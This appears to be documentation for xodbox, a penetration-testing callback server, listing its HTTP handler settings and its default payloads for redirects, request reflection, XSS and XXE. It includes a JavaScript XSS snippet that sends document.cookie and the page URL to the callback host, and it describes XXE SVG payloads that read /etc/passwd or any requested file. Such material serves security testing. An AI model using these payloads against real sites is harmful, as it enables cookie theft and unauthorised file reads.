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HTTPX Handler


Speak HTTP to other computers you may or may not control….


handlerMust be HTTPX
listenerDefault :80
static_dirDirectory to host static files from
payload_dirDirectory to import payloads from

WIP configs that are not fully implemented

tls_domainsComma seperated list of domains
acme_stagingBoolean. Shortcut to use
acme_directory_urlOverride URL
autocert_accept_tosBoolean. Do you accept the CAs TOS?

Additional Information

Things are still being created, documented, and fine-tuned.

New Features

  • Let’s Encrypt Auto Cert
  • Exfil data saver

Legacy Functionality to be implemented.

  • robots.txt
  • unfurly
  • arbitrary json
    • b64
  • redirect
    • b64
  • basic auth
  • breakfastbot
  • allow origin *

Legacy functionality that isnt specific to a handler

  • alert pattern with payload
  • alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
  • slack hook (this is now a notifier)

1 - Default Payloads Seeds

seed data

Default payloads that come with xodbox.

1.1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

1.2 - Redirect

HTTP Redirects

HTTP Redirects to the query parameter l using the query param s as the status code.

WhatDescriptionGET Parameters
LocationLocation to redirect tol
StatusHTTP status codes

Example Request

curl -i "http://xodbox.test/redir?l="

Example Response


1.3 - Robots TXT

A restrictive robots.txt

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

1.4 - Inspect

Reflect back HTTP requests in various formats

Depends on an internal code


Inspect or reflect the request back in various formats.

  • Plain Text (default, .txt)
  • HTML (.html, .html)
  • GIF (.gif)
  • JPEG (.jpg)
  • PNG (.png)
  • MP4 (.mp4)
  • XML (.xml)
  • JSON (.json)
  • Javascript (.js)


  • http://localhost/inspect
  • http://localhost/some/random/path/inspect.gif

1.5 - XSS HTML

Returns HTML that embeds xss-js


Simple HTML to load simple JS Payload.

1.6 - XSS JavaScript

Returns JS that embeds an image back to xodbox


Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.

(function (){
    var s = document.createElement("img");
    s.src="//{{ .Host }}/jscb?src="+window.location+"&c="+document.cookie;

1.7 - Default Favicon

Redirects to the default logo.

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

1.8 - HTML Iframe

HTML page with iframe and image callback


Iframe callback

1.9 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response


1.10 - XXE Callback

More XXE

XXE Callback used by xxe-system

1.11 - XXE DTD

More XXE


A vulnerable application for testing is in ../../../../cmd/xodbox-validator


dtd for use by others

1.12 - XXE SVG Hostname

Returns an SVG payload with XXE to get files


attempts to get /etc/hostname

SVG with XXE payloads

1.13 - XXE SVG Passwd

Returns an SVG payload with XXE to get files


attempts to get /etc/passwd

1.14 - XXE SVG Request Params

Returns an SVG payload with XXE to get files


attempts to get whatever files is supplied via the f query parameter

1.15 - XXE System

More XXE


A vulnerable application for testing is in ../../../../cmd/xodbox-validator

1.16 - Default Page

returns a simple page if nothing is matched

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response


1.17 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

1.17.1 - WPAD

Returns a WPAD config file (Javascript).

WPAD Proxy. Not really useful at the moment. Should be more useful in the future

2 - Example Payloads


Default payloads that come with xodbox.

2.1 - List Payloads

List payloads

List Payloads

title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
    Content-Type: text/plain
  body: |
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    {{ end }}    